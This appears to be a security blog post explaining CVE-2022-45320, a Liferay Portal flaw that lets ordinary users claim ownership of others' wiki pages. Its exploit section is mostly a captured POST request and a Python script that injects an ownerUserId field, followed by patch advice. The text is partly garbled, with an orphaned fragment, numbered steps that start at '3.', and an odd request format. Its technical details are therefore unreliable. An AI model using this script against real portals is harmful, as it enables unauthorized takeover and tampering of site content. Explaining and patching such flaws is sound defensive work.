CVE-2022-45320 - Remote Wiki Page Takeover in Liferay Portal Explained

Liferay is a popular open-source portal used by businesses worldwide to build web platforms. But just like any software, it isn't immune to security issues. One major flaw you might have heard of is CVE-2022-45320. In plain English, this bug lets a logged-in user change ownership of wiki pages—even if they’re not the original creator! This post walks you through what the vulnerability is, how an attacker can exploit it, and how you can protect your site.

What Is CVE-2022-45320?

CVE-2022-45320 affects Liferay Portal versions before 7.4.3.16 and Liferay DXP before 7.2 fix pack 19, 7.3 before update 6, and 7.4 before update 16. Anyone with a valid account (even a regular user) could exploit this flaw. The vulnerability lets them edit a wiki page and sneakily make themselves the page’s owner. Normally, only admins or the page's original author should have that power.

Abuse workflow and content review features.

In a business setting, this could threaten integrity, privacy, and trust.

How Does the Exploit Work?

Let’s see how a malicious user takes over a wiki page.

User edits the target wiki page.

3. During the edit, the user manipulates the HTTP request to change the page owner’s user ID to their own.

Code Snippet Example

Imagine you’re using a browser tool (like Burp Suite) to capture the HTTP request sent when editing a wiki page.

Here's a simplified POST request payload you might see (snipped for clarity)

POST /group/control_panel/manage/-/wiki/edit/page HTTP/1.1
Host: example-liferay-site.com
Cookie: JSESSIONID=abc123...

<wiki-page-form>
  title=VictimPage
  content=Updated content here.
  [...] 
  ownerUserId=20123
  [...]
</wiki-page-form>

> Normally, the ownerUserId should be set automatically by the server, not controlled by the client. But in vulnerable versions, if you add/change the ownerUserId field, Liferay updates the wiki page to show you as the owner!

Here's a basic example using Python (with requests library)

import requests

session = requests.Session()

# 1. Log in manually or via script to get session cookies.

# 2. Prepare payload
payload = {
    'title': 'TargetWikiPage',
    'content': 'Updated by attacker',
    'ownerUserId': 'YOUR_USER_ID',  # <-- The critical part
}

headers = {
    'Cookie': 'JSESSIONID=your-session-id-here'
}

url = "https://example-liferay-site.com/group/control_panel/manage/-/wiki/edit/page";
response = session.post(url, data=payload, headers=headers)

if response.status_code == 200:
    print('Exploit submitted! Check if you\'re now the owner!')
else:
    print('Exploit may have failed.')

Note: Replace YOUR_USER_ID and other details with your own information.

Liferay Official Vulnerability Page:

Liferay CVE-2022-45320 Advisory
- Release Notes / Security Updates:
Liferay Release Notes
- Exploit Database Reference

Summary

CVE-2022-45320 is a dangerous but easy-to-understand flaw. Remote users with basic accounts can hijack wiki page ownerships using a simple tweak to an HTTP request. If your Liferay Portal or DXP is outdated, update immediately, and review who owns what in your system’s wikis. Don’t let attackers take your content hostage!


*Stay safe and keep your portals up to date! If you want more great security deep-dives in plain language, stay tuned!*

Timeline

Published on: 02/20/2024 05:15:07 UTC
Last modified on: 02/12/2025 18:51:52 UTC